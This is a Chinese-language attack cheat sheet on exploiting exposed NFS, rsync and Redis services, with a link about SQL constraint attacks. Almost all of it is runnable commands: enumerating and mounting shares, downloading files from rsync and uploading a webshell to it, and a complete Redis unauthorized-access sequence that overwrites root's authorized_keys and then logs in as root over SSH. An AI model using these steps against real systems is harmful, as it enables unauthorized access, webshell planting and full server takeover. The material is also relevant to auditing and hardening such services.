NFS漏洞:(Network File System 即网络文件系统NFS 默认工作在2049端口)
目录列举:
方法1:
nmap -script=nfs-ls.nse 127.0.0.1
方法2.
挂载到本地
mount -t nfs 192.168.0.1:/export/home /tmp/badperms
为了mount一个NFS共享需要首先在本地系统上创建一个目录,切换目录到/tmp/badperms然后你会看到位于IP地址为192.168.0.1上的export/home目录的内容。
Rsync (linux下的文件同步服务,默认工作在873端口,centos6.3上已经默认安装)
目录列举
方法1:
nmap -script=rsync-list-modules 127.0.0.1
方法2.
列举整个同步目录或指定目录:
rsync 10.0.0.12::
rsync 10.0.0.12::www/
下载文件或目录到本地:
rsync -avz 10.0.0.12::www/test.php /root
rsync -avz 10.0.0.12::www//var/tmp
上传本地文件到服务端:
rsync -avz webshell.php 10.0.0.12::www/
Redis 未授权访问缺陷可轻易导致系统被黑
1 $ssh-keygen -t rsa //本地产生公私钥文件 2 $(echo -e " " ;cat id_rsa.pub;echo -e " ") > foo.txt //将公钥写入foo.txt文件 3 $cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit 4 $redis-cli -h 192.168.1.11 5 $ 192.168.1.11:6379> config set dir /root/.ssh/ 6 OK 7 $ 192.168.1.11:6379> config get dir 8 1) "dir" 9 2) "/root/.ssh" 10 $ 192.168.1.11:6379> config set dbfilename "authorized_keys" 11 OK 12 $ 192.168.1.11:6379> save 13 OK
这样就可以成功的将自己的公钥写入/root/.ssh文件夹的authotrized_keys文件里,然后攻击者直接执行:
$ ssh –i id_rsa root@192.168.1.11
即可远程利用自己的私钥登录该服务器。
当然,写入的目录不限于/root/.ssh 下的authorized_keys,也可以写入用户目录,不过Redis很多以root权限运行,所以写入root目录下,可以跳过猜用户的步骤。
详情请点此链接:https://www.seebug.org/vuldb/ssvid-89715
基于约束的SQL攻击
详情见地址:http://www.phpbug.cn/archives/639.html#more-639